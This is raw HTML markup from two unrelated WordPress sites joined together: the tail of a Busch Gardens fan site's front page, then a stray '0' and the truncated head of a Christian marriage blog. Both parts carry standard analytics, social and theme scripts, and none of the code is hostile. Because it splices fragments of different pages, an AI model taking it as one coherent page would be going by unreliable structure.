square " > <div class="inner"> <div class="image-background" style="background-color:#2ecc71;background-image:url('https://i2.wp.com/bgwfans.com/wp-content/uploads/2018/08/PostHEad.jpg?fit=960%2C481&ssl=1');"> </div> <div class="image-cover" style="background-color:rgba(0,0,0,0.4);"> <div class="inner"> <h3><a href="https://bgwfans.com/2018/2019-projects-revisited/" title="2019 Projects: Revisited" class="title ajaxlink">2019 Projects: Revisited</a></h3> <span class="meta"> <span class="date"> September 1, 2018 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/zachary/">Zachary</a> </span> <span> 5 min read </span> </span> </div> </div> </div> </div><div class="article-card square double " > <div class="inner"> <div class="image-background" style="background-color:#e74c3c;background-image:url('');"> </div> <div class="image-cover" style="background-color:rgba(0,0,0,0.4);"> <div class="inner"> <h3><a href="https://bgwfans.com/2018/railroad-explosion-shuts-down-part-of-busch-gardens/" title="Railroad Fire Shuts Down Part of Busch Gardens" class="title ajaxlink">Railroad Fire Shuts Down Part of Busch Gardens</a></h3> <span class="meta"> <span class="date"> August 16, 2018 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/zachary/">Zachary</a> </span> <span> 4 min read </span> </span> </div> </div> </div> </div><div class="article-card square " > <div class="inner"> <div class="image-background" style="background-color:#3498db;background-image:url('https://i0.wp.com/bgwfans.com/wp-content/uploads/2018/08/Head.jpg?fit=960%2C570&ssl=1');"> </div> <div class="image-cover" style="background-color:rgba(0,0,0,0.4);"> <div class="inner"> <h3><a href="https://bgwfans.com/2018/water-country-usa-2019-attraction/" title="Revealing Water Country USA&#8217;s 2019 Attraction Plans" class="title ajaxlink">Revealing Water Country USA&#8217;s 2019 Attraction Plans</a></h3> <span class="meta"> <span class="date"> August 14, 2018 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/zachary/">Zachary</a> </span> <span> 7 min read </span> </span> </div> </div> </div> </div><div class="article-card square " > <div class="inner"> <div class="image-background" style="background-color:#e74c3c;background-image:url('https://i0.wp.com/bgwfans.com/wp-content/uploads/2018/08/Madrid-RPA-Head-1.jpg?fit=960%2C504&ssl=1');"> </div> <div class="image-cover" style="background-color:rgba(0,0,0,0.4);"> <div class="inner"> <h3><a href="https://bgwfans.com/2018/project-madrid-is-a-coaster/" title="Project Madrid is a Coaster" class="title ajaxlink">Project Madrid is a Coaster</a></h3> <span class="meta"> <span class="date"> August 10, 2018 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/zachary/">Zachary</a> </span> <span> 2 min read </span> </span> </div> </div> </div> </div><div class="article-card square " > <div class="inner"> <div class="image-background" style="background-color:#95a5a6;background-image:url('https://i0.wp.com/bgwfans.com/wp-content/uploads/2018/06/Untitled-1-2.jpg?fit=960%2C698&ssl=1');"> </div> <div class="image-cover" style="background-color:rgba(0,0,0,0.4);"> <div class="inner"> <h3><a href="https://bgwfans.com/2018/project-2019-revealed/" title="Project 2019 Revealed" class="title ajaxlink">Project 2019 Revealed</a></h3> <span class="meta"> <span class="date"> June 13, 2018 </span> <span class="author"> By <a class="ajaxlink" href="https://bgwfans.com/author/zachary/">Zachary</a> </span> <span> 6 min read </span> </span> </div> </div> </div> </div> </div><!-- #main --> </div><!-- #primary --> <div class="frontpage-navigation" style="display:none"> <a class="arrow ajaxlink arrow-right" href="https://bgwfans.com/page/2/"> <i>&#xe823;</i> </a> </div> <div id="load-more"></div> <script> jQuery(function() { jQuery('#main').infinitescroll({ loading: { //finished: undefined, finishedMsg: "<em><i>&#xe935;</i> No more articles</em>", img: "data:image/gif;base64,R0lGODlhAQABAHAAACH5BAUAAAAALAAAAAABAAEAAAICRAEAOw==", msg: null, msgText: "<em><i>&#xe93b;</i> Loading more articles ...</em>", selector: '#load-more', speed: 'normal', //start: undefined }, state: { isDuringAjax: false, isInvalidPage: false, isDestroyed: false, isDone: false, // For when it goes all the way through the archive. isPaused: false, currPage: 1 }, debug: false, //behavior: undefined, binder: jQuery(window), // used to cache the selector for the element that will be scrolling nextSelector: ".frontpage-navigation a.arrow-right", navSelector: ".frontpage-navigation", extraScrollPx: 150, itemSelector: ".article-card", animate: false, pathParse: undefined, dataType: 'html', appendCallback: true, bufferPx: 140, errorCallback: function () { }, //pixelsFromNavToBottom: undefined, //path: undefined, // Can either be an array of URL parts (e.g. ["/page/", "/"]) or a function that accepts the page number and returns a URL prefill: true, // When the document is smaller than the window, load data until the document is larger or links are exhausted //maxPage:undefined // to manually control maximum page (when maxPage is undefined, maximum page limitation is not work) }); }); </script> </div><!-- #content --> </div><!-- /scroller-inner --> </div><!-- /scroller --> </div><!-- /pusher --> </div><!-- /container --> <script> function pushmenu() { jQuery('#mp-menu, .scroller').addClass('cbp-spmenu-push-toright'); jQuery( ".push-cover" ).bind( "click", function() { pushmenu_close(); }); } function pushmenu_close() { jQuery('#mp-menu, .scroller').removeClass('cbp-spmenu-push-toright'); } function scrollto(div, time, offset) { if (!time) time = 600; if (!offset) offset = 0; jQuery('html, body').animate({scrollTop: jQuery(div).offset().top + offset}, time); } // back to top and menu buttons --------------------------------------------------------------------------- var previousScroll = 0, headerOrgOffset = jQuery('#top-controls').height(); jQuery(window).scroll(function () { toolbar = jQuery('#top-controls'); var currentScroll = jQuery(this).scrollTop(); if (currentScroll > headerOrgOffset + 500) { if (currentScroll >= previousScroll ) { toolbar.removeClass('animated fadeInDown').addClass('animated fadeOutUp') } else { toolbar.removeClass('animated fadeOutUp').addClass('affix animated veryfast fadeInDown') } } else { toolbar.removeClass('animated affix fadeInDown fadeOutUp') } previousScroll = currentScroll; }); // -------------------------------------------------------------------------------------------------------- </script> </div><!-- #page --> <div style="display:none"> </div> <script> (function($) { $.fn.parallax = function(options) { var windowHeight = $(window).height(); // Establish default settings var settings = $.extend({ speed : 0.15 }, options); // Iterate over each object in collection return this.each( function() { // Save a reference to the element var $this = $(this); // Set up Scroll Handler $(document).scroll(function(){ var scrollTop = $(window).scrollTop(); var offset = $this.offset().top; var height = $this.outerHeight(); // Check if above or below viewport if (offset + height <= scrollTop || offset >= scrollTop + windowHeight) { return; } var yBgPosition = Math.round((offset - scrollTop) * settings.speed); // Apply the Y Background Position to Set the Parallax Effect $this.css('background-position', 'center ' + yBgPosition + 'px'); }); }); } }(jQuery)); jQuery('.image-background.image-final.image-in-single-page').parallax({ speed : 0.50 }); </script> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_EN/sdk.js#xfbml=1&appId=2244626782424099&version=v2.0"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/bgwfans.com\/wp-admin\/admin-ajax.php","nonce":"18283dfc27","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/bgwfans.com\/wp-login.php?redirect_to=https%3A%2F%2Fbgwfans.com%2F2019%2Fbgw-project-2021%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='https://bgwfans.com/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=20170209'></script> <script type='text/javascript' src='https://bgwfans.com/wp-content/plugins/jetpack/_inc/build/photon/photon.min.js?ver=20130122'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://bgwfans.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.10'></script> <script type='text/javascript' src='https://bgwfans.com/wp-content/plugins/jetpack/modules/likes/queuehandler.js?ver=6.8'></script> <script type='text/javascript' src='https://bgwfans.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:6.8',blog:'9094839',post:'0',tz:'-4',srv:'bgwfans.com'} ]); _stq.push([ 'clickTrackerInit', '9094839', '0' ]); </script> </body> </html>
0
<!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US"> <![endif]--> <!--[if !(IE 7) | !(IE 8) ]><!--> <html lang="en-US"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width" /> <title>Home | Hot, Holy &amp; Humorous</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://hotholyhumorous.com/xmlrpc.php" /> <!--[if lt IE 9]> <script src="https://hotholyhumorous.com/wp-content/themes/twentytwelve/js/html5.js" type="text/javascript"></script> <![endif]--> <script>(function(d, s, id){ var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) {return;} js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.6"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <!-- This site is optimized with the Yoast SEO plugin v11.2.1 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://hotholyhumorous.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home | Hot, Holy &amp; Humorous" /> <meta property="og:description" content="God wants you to have a great sex life! Struggling to embrace your God-given sexuality? Unsure how to get your spouse on board? Looking for sex tips that align with godliness? If any of those describe you, welcome! While sex is a significant part of marriage, it&#8217;s not always easy to navigate or nurture. Hot, Holy &hellip;" /> <meta property="og:url" content="https://hotholyhumorous.com/" /> <meta property="og:site_name" content="Hot, Holy &amp; Humorous" /> <meta property="og:image" content="https://hotholyhumorous.com/wp-content/uploads/2016/02/default_og.png" /> <meta property="og:image:secure_url" content="https://hotholyhumorous.com/wp-content/uploads/2016/02/default_og.png" /> <meta property="og:image:width" content="735" /> <meta property="og:image:height" content="387" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="God wants you to have a great sex life! Struggling to embrace your God-given sexuality? Unsure how to get your spouse on board? Looking for sex tips that align with godliness? If any of those describe you, welcome! While sex is a significant part of marriage, it&#8217;s not always easy to navigate or nurture. Hot, Holy [&hellip;]" /> <meta name="twitter:title" content="Home | Hot, Holy &amp; Humorous" /> <meta name="twitter:site" content="@hotholyhumorous" /> <meta name="twitter:image" content="https://hotholyhumorous.com/wp-content/uploads/2016/02/default_og.png" /> <meta name="twitter:creator" content="@hotholyhumorous" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://hotholyhumorous.com/#organization","name":"Hot, Holy & Humorous","url":"https://hotholyhumorous.com/","sameAs":["https://www.facebook.com/hotholyandhumorous/","https://www.pinterest.com/hotholyhumorous/","https://twitter.com/hotholyhumorous"],"logo":{"@type":"ImageObject","@id":"https://hotholyhumorous.com/#logo","url":"https://hotholyhumorous.com/wp-content/uploads/2018/01/Hot-Holy-Humorous-new-logo.jpg","width":1050,"height":416,"caption":"Hot, Holy & Humorous"},"image":{"@id":"https://hotholyhumorous.com/#logo"}},{"@type":"WebSite","@id":"https://hotholyhumorous.com/#website","url":"https://hotholyhumorous.com/","name":"Hot, Holy &amp; Humorous","publisher":{"@id":"https://hotholyhumorous.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://hotholyhumorous.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://hotholyhumorous.com/#webpage","url":"https://hotholyhumorous.com/","inLanguage":"en-US","name":"Home | Hot, Holy &amp; Humorous","isPartOf":{"@id":"https://hotholyhumorous.com/#website"},"about":{"@id":"https://hotholyhumorous.com/#organization"},"image":{"@type":"ImageObject","@id":"https://hotholyhumorous.com/#primaryimage","url":"https://hotholyhumorous.com/wp-content/uploads/2016/02/default_og.png","width":735,"height":387},"primaryImageOfPage":{"@id":"https://hotholyhumorous.com/#primaryimage"},"datePublished":"2016-02-23T16:40:22+00:00","dateModified":"2018-11-14T01:49:42+00:00"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//ws.sharethis.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /> <link rel="alternate" type="application/rss+xml" title="Hot, Holy &amp; Humorous &raquo; Feed" href="https://hotholyhumorous.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Hot, Holy &amp; Humorous &raquo; Comments Feed" href="https://hotholyhumorous.com/comments/feed/" /> <!-- This site uses the Google Analytics by MonsterInsights plugin v7.6.0 - Using Analytics tracking - https://www.monsterinsights.com/ --> <script type="text/javascript" data-cfasync="false"> var mi_version = '7.6.0'; var mi_track_user = true; var mi_no_track_reason = ''; var disableStr = 'ga-disable-UA-96926002-1'; /* Function to detect opted out users */ function __gaTrackerIsOptedOut() { return document.cookie.indexOf(disableStr + '=true') > -1; } /* Disable tracking if the opt-out cookie exists. */ if ( __gaTrackerIsOptedOut() ) { window[disableStr] = true; } /* Opt-out function */ function __gaTrackerOptout() { document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/'; window[disableStr] = true; } if ( mi_track_user ) { (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker'); __gaTracker('create', 'UA-96926002-1', 'auto'); __gaTracker('set', 'forceSSL', true); __gaTracker('require', 'displayfeatures'); __gaTracker('send','pageview'); } else { console.log( "" ); (function() { /* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */ var noopfn = function() { return null; }; var noopnullfn = function() { return null; }; var Tracker = function() { return null; }; var p = Tracker.prototype; p.get = noopfn; p.set = noopfn; p.send = noopfn; var __gaTracker = function() { var len = arguments.length; if ( len === 0 ) { return; } var f = arguments[len-1]; if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) { console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + mi_no_track_reason ); return; } try { f.hitCallback(); } catch (ex) { } }; __gaTracker.create = function() { return new Tracker(); }; __gaTracker.getByName = noopnullfn; __gaTracker.getAll = function() { return []; }; __gaTracker.remove = noopfn; window['__gaTracker'] = __gaTracker; })(); } </script> <!-- / Google Analytics by MonsterInsights --> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/hotholyhumorous.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='atomic-blocks-fontawesome-css' href='https://hotholyhumorous.com/wp-content/plugins/atomic-blocks/dist/assets/fontawesome/css/all.min.css?ver=1556864395' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://hotholyhumorous.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=1558017885' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-theme-css' href='https://hotholyhumorous.com/wp-content/plugins/gutenberg/build/block-library/theme.css?ver=1558017885' type='text/css' media='all' /> <link rel='stylesheet' id='atomic-blocks-style-css-css' href='https://hotholyhumorous.com/wp-content/plugins/atomic-blocks/dist/blocks.style.build.css?ver=1556864395' type='text/css' media='all' /> <link rel='stylesheet' id='ugb-style-css-css' href='https://hotholyhumorous.com/wp-content/plugins/stackable-ultimate-gutenberg-blocks/dist/frontend_blocks.css?ver=1.15.2' type='text/css' media='all' /> <style id='ugb-style-css-inline-css' type='text/css'> :root { --content-width: 625px; } </style> <link rel='stylesheet' id='uagb-block-css-css' href='https://hotholyhumorous.com/wp-content/plugins/ultimate-addons-for-gutenberg/dist/blocks.style.build.css?ver=1.13.3' type='text/css' media='all' /> <link rel='stylesheet' id='uagb-slick-css-css' href='https://hotholyhumorous.com/wp-content/plugins/ultimate-addons-for-gutenberg/assets/css/slick.css?ver=1.13.3' type='text/css' media='all' /> <link rel='stylesheet' id='pdfemb-gutenberg-block-backend-js-css' href='https://hotholyhumorous.com/wp-content/plugins/pdf-embedder/css/pdfemb-blocks.css?ver=4.0' type='text/css' media='all' /> <link rel='stylesheet' id='bcct_style-css' href='https://hotholyhumorous.com/wp-content/plugins/better-click-to-tweet/assets/css/styles.css?ver=3.0' type='text/css' media='all' /> <link rel='stylesheet' id='ctt-css' href='https://hotholyhumorous.com/wp-content/plugins/click-to-tweet/css/ctt-module-design.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='mailerlite_forms.css-css' href='https://hotholyhumorous.com/wp-content/plugins/official-mailerlite-sign-up-forms/assets/css/mailerlite_forms.css?ver=1.4.1' type='text/css' media='all' /> <link rel='stylesheet' id='pms-style-front-end-css' href='https://hotholyhumorous.com/wp-content/plugins/paid-member-subscriptions/assets/css/style-front-end.css?ver=1.8.9' type='text/css' media='all' /> <link rel='stylesheet' id='simple-share-buttons-adder-indie-css' href='//fonts.googleapis.com/css?family=Indie+Flower&#038;ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='simple-share-buttons-adder-font-awesome-css' href='//maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='css-wpimagehover-css' href='https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/css/wpimagehover.css' type='text/css' media='all' /> <link rel='stylesheet' id='elusive-icon-css' href='https://hotholyhumorous.com/wp-content/plugins/wp-image-hover-lite/includes/redux-framework/ReduxCore/assets/css/vendor/elusive-icons/elusive-webfont.css' type='text/css' media='all' /> <link rel='stylesheet' id='mbt-style-css' href='https://hotholyhumorous.com/wp-content/plugins/mybooktable/css/frontend-style.css?ver=3.2.1' type='text/css' media='all' /> <link rel='stylesheet' id='mbt-style-pack-css' href='https://hotholyhumorous.com/wp-content/plugins/mybooktable/styles/orange_flat/style.css?ver=3.2.1' type='text/css' media='all' /> <link rel='stylesheet' id='twentytwelve-fonts-css' href='https://fonts.googleapis.com/css?family=Open+Sans:400italic,700italic,400,700&#038;subset=latin,latin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='twentytwelve-style-css' href='https://hotholyhumorous.com/wp-content/themes/HotHolyHumorous/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='twentytwelve-block-style-css' href='https://hotholyhumorous.com/wp-content/themes/twentytwelve/css/blocks.css?ver=20181230' type='text/css' media='all' /> <!--[if lt IE 9]> <link rel='stylesheet' id='twentytwelve-ie-css' href='https://hotholyhumorous.com/wp-content/themes/twentytwelve/css/ie.css?ver=20121010' type='text/css' media='all' /> <![endif]--> <link rel='stylesheet' id='jetpack_css-css' href='https://hotholyhumorous.com/wp-content/plugins/jetpack/css/jetpack.css?ver=7.3.1' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,exe,js,pdf,ppt,tgz,zip,xls","inbound_paths":"[]","home_url":"https:\/\/hotholyhumorous.com","hash_tracking":"false"}; /* ]]> */ </script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend.min.js?ver=7.6.0'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/stackable-ultimate-gutenberg-blocks/dist/frontend_blocks.js?ver=1.15.2'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/ultimate-addons-for-gutenberg/assets/js/isotope.min.js?ver=1.13.3'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/ultimate-addons-for-gutenberg/assets/js/imagesloaded.min.js?ver=1.13.3'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/ultimate-addons-for-gutenberg/assets/js/table-of-contents.js?ver=1.13.3'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/ultimate-addons-for-gutenberg/assets/js/slick.min.js?ver=1.13.3'></script> <script type='text/javascript' src='https://hotholyhumorous.com/wp-content/plugins/paid-member-subscriptions/assets/js/front-end.js?ver=1.8.9'></script> <script id='st_insights_js' type='text/javascript' src='https://ws.sharethis.com/button/st_insights.js?publisher=4d48b7c5-0ae3-43d4-bfbe-3ff8c17a8ae6&#038;product=simpleshare'></script> <link rel='https://api.w.org/' href='https://hotholyhumorous.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://hotholyhumorous.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://hotholyhumorous.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://wp.me/P3Xgdo-3bb' /> <link rel="alternate" type="application/json+oembed" href="https://hotholyhumorous.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhotholyhumorous.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://hotholyhumorous.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fhotholyhumorous.com%2F&#038;format=xml" /> <!-- Facebook Pixel Code --> <script> !function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window,document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '561135890895325'); fbq('track', 'PageView'); </script> <noscript> <img height="1" width="1" src="https://www.facebook.com/tr?id=561135890895325&ev=PageView &noscript=1"/> </noscript> <!-- End Facebook Pixel Code --> <!-- MailerLite Universal --> <script> (function (m, a, i, l, e, r) { m['MailerLiteObject'] = e; function f() { var c = {a: arguments, q: []}; var r = this.push(c); return "number" != typeof r ? r : f.bind(c.q); } f.q = f.q || []; m[e] = m[e] || f.bind(f.q); m[e].q = m[e].q || f.q; r = a.createElement(i); var _ = a.getElementsByTagName(i)[0]; r.async = 1; r.src = l + '?' + (~~(new Date().getTime() / 10000000)); _.parentNode.insertBefore(r, _); })(window, document, 'script', 'https://static.mailerlite.com/js/universal.js', 'ml'); var ml_account = ml('accounts', '1258514', 'o2m5w1f9y1', 'load'); </script> <!-- End MailerLite Universal --> <!-- Plugin: Open external links a new window. Plugin by Kristian Risager Larsen, http://kristianrisagerlarsen.dk . Download it at http://wordpress.org/extend/plugins/open-external-links-in-a-new-window/ --> <script type="text/javascript">//<![CDATA[ function external_links_in_new_windows_loop() { if (!document.links) { document.links = document.getElementsByTagName('a'); } var change_link = false; var force = ''; var ignore = ''; for (var t=0; t<document.links.length; t++) { var all_links = document.links[t]; change_link = false; if(document.links[t].hasAttribute('onClick') == false) { // forced if the address starts with http (or also https), but does not link to the current domain if(all_links.href.search(/^http/) != -1 && all_links.href.search('hotholyhumorous.com') == -1) { // alert('Changeda '+all_links.href); change_link = true; } if(force != '' && all_links.href.search(force) != -1) { // forced // alert('force '+all_links.href); change_link = true; } if(ignore != '' && all_links.href.search(ignore) != -1) { // alert('ignore '+all_links.href); // ignored change_link = false; } if(change_link == true) { // alert('Changed '+all_links.href); document.links[t].setAttribute('onClick', 'javascript:window.open(\''+all_links.href+'\'); return false;'); document.links[t].removeAttribute('target'); } } } } // Load function external_links_in_new_windows_load(func) { var oldonload = window.onload; if (typeof window.onload != 'function'){ window.onload = func; } else { window.onload = function(){ oldonload(); func(); } } } external_links_in_new_windows_load(external_links_in_new_windows_loop); //]]></script> <script type="text/javascript" async defer data-pin-color="red" data-pin-hover="true" src="https://hotholyhumorous.com/wp-content/plugins/pinterest-pin-it-button-on-image-hover-and-post/js/pinit.js"></script> <script> </script> <style type="text/css">.mbt-book .mbt-book-buybuttons .mbt-book-buybutton img { width: 172px; height: 30px; } .mbt-book .mbt-book-buybuttons .mbt-book-buybutton { padding: 4px 8px 0px 0px; }.mbt-book-archive .mbt-book .mbt-book-buybuttons .mbt-book-buybutton img { width: 172px; height: 30px; } .mbt-book-archive .mbt-book .mbt-book-buybuttons .mbt-book-buybutton { padding: 4px 8px 0px 0px; }.mbt-featured-book-widget .mbt-book-buybuttons .mbt-book-buybutton img { width: 172px; height: 30px; } .mbt-featured-book-widget .mbt-book-buybuttons .mbt-book-buybutton { padding: 4px 8px 0px 0px; }</style> <script type="text/javascript"> window.ajaxurl = "https://hotholyhumorous.com/wp-admin/admin-ajax.php"; </script> <style type="text/css">.mbt-book-buybuttons .mbt-universal-buybutton { margin: 0; display: inline-block; box-sizing: border-box; }.mbt-book .mbt-book-buybuttons .mbt-universal-buybutton { font-size: 15px; line-height: 16px; padding: 6px 12px; width: 172px; min-height: 30px; }.mbt-book-archive .mbt-book .mbt-book-buybuttons .mbt-universal-buybutton { font-size: 15px; line-height: 16px; padding: 6px 12px; width: 172px; min-height: 30px; }.mbt-featured-book-widget .mbt-book-buybuttons .mbt-universal-buybutton { font-size: 15px; line-height: 16px; padding: 6px 12px; width: 172px; min-height: 30px; }</style> <style type="text/css" media="all" 